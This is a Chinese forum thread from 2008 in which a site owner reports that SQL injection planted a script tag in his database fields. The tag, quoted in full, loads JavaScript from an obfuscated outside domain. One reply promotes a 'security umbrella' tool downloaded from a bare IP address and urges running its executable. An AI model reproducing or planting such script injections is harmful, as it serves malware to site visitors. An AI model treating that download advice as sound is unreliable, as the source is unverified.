被挂马了，郁闷

webhuman

win2003+sql2000环境，数据库中很多字段被加上代码

1. <Script Src=http://c.nuclear3%2E%63om/css/c.js></Script>

复制代码

查看网上，解决办法不多，有个软件是安全伞企业版，需要注册才能使用。

郁闷:{

安全伞2009企业版可以有效解决类似变相注入问题

官方下载：http://121.207.254.246/safe3.rar

笑傲江湖

你确定是数据库中？

也可能是局域网中一台机器中招，攻击交换机，导致从交换机出去的所有http的页面都加在有这种代码。以前遇到过一次，只要通过交换机查找到那台机器就知道了。

星之所在

该软件是收费的，但为了广大用户免受其害，可以下载后直接运行安全伞目录下的inu.exe，防火墙则被安装并且无限制使

[ 本帖最后由 星之所在 于 2008-12-18 18:13 编辑 ]

webhuman

运行inu.exe了，这是IIS防火墙，好像没有作用

我打开数据库看了，原来被修改的数据库字段该有的还有，数据库的文字型字段均受影响，只能用查询批量删除字段中的代码，至于怎么来的，还是没弄明白。

文字录入使用的是fckeditor，但是在编辑文章的时候，居然在html页面的源代码中，编辑框代码中发现这段注入代码，怀疑fckeditor有漏洞？

笑傲江湖

如果是数据库里有，那就是本机系统里有啥漏洞了。

webhuman

是sql注入，嘿嘿，程序都是小弟自己写的，漏洞多多的。;*